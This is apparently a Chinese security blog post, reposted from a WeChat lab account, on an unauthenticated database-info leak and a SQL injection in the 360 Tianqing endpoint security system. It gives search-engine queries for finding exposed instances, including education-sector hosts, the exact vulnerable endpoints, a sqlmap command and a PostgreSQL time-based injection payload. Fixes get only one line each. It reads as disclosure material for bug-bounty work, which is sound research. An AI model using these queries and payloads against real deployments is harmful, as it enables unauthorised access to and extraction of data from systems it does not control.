EDUSRC-记某擎未授权与sql注入

admin 2024年2月24日00:54:17评论21 views字数 1074阅读3分34秒阅读模式

前言

声明:这里是由零信任安全实验室组建的一个知识平台,平台有批量验证的脚本、工具以及一些漏洞的POC,后续还会分享网络安全资源(漏洞挖掘文章 工具 资讯以及SRC漏洞挖掘案例分享等等,资源多多,干货多多!
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。工具
来自网络,安全性自测。

      欢迎加入零信任攻防实验室的知识星球,星球免费!后续会抽奖送360定制周边礼品哈,敬请期待!平台有批量验证的脚本、工具以及一些漏洞的POC,和分享网络安全资源(漏洞挖掘文章 工具 资讯)  以及SRC漏洞挖掘的技巧分享等等,资源多多,干货多多!

EDUSRC-记某擎未授权与sql注入

作者:杳若

360天擎 - 未授权与sql注入

通常访问的页面如下,存在登录框

EDUSRC-记某擎未授权与sql注入

信息收集

FOFA语法

  1. title="360新天擎"

需重点关注框框的图标,可以聚焦资产搜索

EDUSRC-记某擎未授权与sql注入

  1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法,相对来说资产较少,因为是老洞

  1. web.title="360新天擎"&& ip.isp="教育"

EDUSRC-记某擎未授权与sql注入

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

GET /api/dbstat/gettablessize HTTP/1.1Host: {{Hostname}}

EDUSRC-记某擎未授权与sql注入

修复方案

未授权更多的是鉴权问题,增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1Host: {{Hostname}}

大致页面如下所示

EDUSRC-记某擎未授权与sql注入

这时候丢到sqlmap中(可能会慢,因为是时间注入)

  1. python .sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

EDUSRC-记某擎未授权与sql注入

手动测试方法

360天擎用的大概率是PostgreSQL,尝试如下时间注入payload,然后注意页面响应时间

  1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

EDUSRC-记某擎未授权与sql注入

原文始发于微信公众号(零信任攻防实验室):EDUSRC-记某擎未授权与sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日00:54:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   EDUSRC-记某擎未授权与sql注入https://cn-sec.com/archives/2113328.html

发表评论

匿名网友 填写信息